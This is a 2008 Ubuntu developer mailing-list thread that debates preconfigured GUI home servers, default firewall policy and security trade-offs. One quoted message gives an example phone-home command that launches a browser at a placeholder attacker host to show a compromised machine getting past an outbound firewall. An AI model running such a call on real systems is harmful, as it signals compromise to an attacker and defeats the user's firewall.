Disappointed with Ubuntu Server, could be used by such a wider audience

Anthony Watters tonyozwatters at yahoo.com
Mon Aug 4 23:05:40 UTC 2008


One way or another the world is going to head in this direction for home and small business users (http://www.microsoft.com/windows/products/winfamily/windowshomeserver/default.mspx). Of course, for large scale enterprises, which is where Ubuntu Server is clearly aimed, it's a different story where heavy duty SMP NUMA, work from the command line, etc. make a lot of sense. However, home and small business owners don't need any of that but, more importantly, they don't have the time or resources for the kind of administration that Ubuntu Server requires. At the same time the home/SOHO/small to medium business arena is a huge and currently ignored segment, but not for long.

I now realise and understand the focus of Ubuntu Server, which is fine, but I am taking a different path, likely based on Ubuntu Desktop, to achieve my (mostly) preconfigured, GUI based personal server (Web server/Webmail server/File server and gateway). If that doesn't work out then I'll head down the ClarkConnect (www.clarkconnect.com) CentOS/RHEL path. I am also liaising with others on this too who want this. One way or another I will get the kind of system I want.

Regards,

Tony



----- Original Message ----
From: Stephan Hermann <sh at sourcecode.de>
To: ubuntu-devel-discuss at lists.ubuntu.com
Sent: Monday, August 4, 2008 3:27:59 PM
Subject: Re: Disappointed with Ubuntu Server, could be used by such a wider audience

On Sun, Aug 03, 2008 at 10:40:42AM +0800, John McCabe-Dansted wrote:
> On Sat, Aug 2, 2008 at 6:23 AM, Mackenzie Morgan <macoafi at gmail.com> wrote:
> > Because as he said, if you pre-configure everything to
> > super-duper-easy-peasy, you've also pre-configured it to
> > super-duper-easy-peasy-to-crack.  I'm personally disappointed by
> > firewalls that allow outbound by default, because something could phone
> > home if I put my trust in an application I shouldn't, but they're
> > easy-peasy for users, so that's what people do.  I can manually go
> > through and fix it myself, but if some application is running about
> > opening who knows how many ports and setting god-knows-what services to
> > auto-start and mucking about with insecure options in config files...how
> > many months is it going to take me to track all of that down?  No way.
> 
> Commercial Windows firewalls pretty much all block outbound traffic by
> default, popping up a dialog box offering to allow that particular
> application to access the internet. I understand that it is fairly
> easy for an attacker to phone home though. For example, just run
> firefox http://ATTACKER/this-machine-is-cracked.

Well, for firefox and doing this it needs manual intervention.
For a user clicking on a malicious url, which executes some really bad
javascript, this is more the type of stuff we face today. Layer 8 + 9
Problem.

> However, if it is good practice to prevent e.g. httpd making outgoing
> connections this should be done by default. It is fairly easy to do
> this with e.g. systrace.

http doesn't make any outgoing connection, until you connect to the
httpd and it creates a >1024 connection to the client.

Outgoing connections actually are not allowed by Windows firewall, minus
all unknown system apps which are calling back to MS by default and are
allowed to do that on purpose.

> The arguments that it is hard to set up these systems to be secure
> seems to be an argument that they should be secured once, by Ubuntu,
> with a great deal of scrutiny on whether the configuration really is
> secure.  Even if we assume that everyone will hire a UNIX guru we
> can't assume that all the "gurus" really are gurus or that they won't
> forget one tiny exploit.

a) there is no security in general
b) if there is, please read point a)

> Ubuntu desktop already has one server function. I can right click a
> file, go to share and share the folder using samba. If you know of any
> security flaws with this GUI, please report a bug.

I wonder if you share your samba drives over the internet...if so,
something is a) wrong with your router, and b) I wouldn't let you do
any work on my network...sounds hard, but it is. And yes, we should
prevent users from doing those stupid things.

Regards,

\sh
-- 
Stephan '\sh' Hermann        | OSS Developer & Systemadministrator
JID: sh at linux-server.org    | http://www.sourcecode.de/
GPG ID: 0xC098EFA8        | http://leonov.tv/
3D8B 5138 0852 DA7A B83F  DCCB C189 E733 C098 EFA8
